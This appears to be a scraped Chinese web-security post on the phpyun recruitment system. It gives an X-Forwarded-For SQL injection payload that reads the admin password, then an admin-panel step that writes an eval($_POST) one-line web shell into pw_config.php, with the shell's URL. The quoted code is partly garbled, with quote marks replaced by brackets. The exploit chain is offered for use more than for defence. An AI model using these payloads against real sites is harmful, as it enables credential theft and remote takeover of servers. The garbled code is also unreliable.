/model/class/action.class.php 603行
function fun_ip_get() {
if (getenv([HTTP_CLIENT_IP]) && strcasecmp(getenv([HTTP_CLIENT_IP]), [unknown])) {
$ip = getenv([HTTP_CLIENT_IP]);
} else
if (getenv([HTTP_X_FORWARDED_FOR]) && strcasecmp(getenv([HTTP_X_FORWARDED_FOR]), [unknown])) {
$ip = getenv([HTTP_X_FORWARDED_FOR]);
} else
if (getenv([REMOTE_ADDR]) && strcasecmp(getenv([REMOTE_ADDR]), [unknown])) {
$ip = getenv([REMOTE_ADDR]);
} else
if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], [unknown])) {
$ip = $_SERVER['REMOTE_ADDR'];
} else {
$ip = [unknown];
}
return ($ip);
}
127.1′,`email`=(select password from phpyun_admin_user where username=’admin’) where `uid`=1#
uid在登录是抓包可得.
后台getshell
function save_action()
{
extract($_POST); $config = [<?php [;
$uc_config = str_replace([′],]‘],$uc_config);
$uc_config = str_replace([]",]"],$uc_config);
$uc_config = str_replace([\’],]"],$uc_config);
$uc_config = str_replace([\‘],]"],$uc_config);
$uc_config = str_replace([\’],]"],$uc_config);
$uc_config = str_replace([’],]"],$uc_config);
$uc_config = str_replace([‘],]"],$uc_config);
$uc_config = str_replace([\]",]"],$uc_config);
$config .= $uc_config;
$path = APP_PATH.]/api/pw_api/pw_config.php];
$fp = @fopen($path,]w]);
fwrite($fp,$config);
fclose($fp);
过滤了不少.但是对我们没啥用
进入后台->网站工具->整合pw
最后面插入
eval ($_POST[DisKill]) ;
开启pw
一句话地址:http://www.2cto.com /api/pw_api/pw_config.php
查看更多关于phpyun人才系统注入+后台getshell - 网站安全 - 自学的详细内容...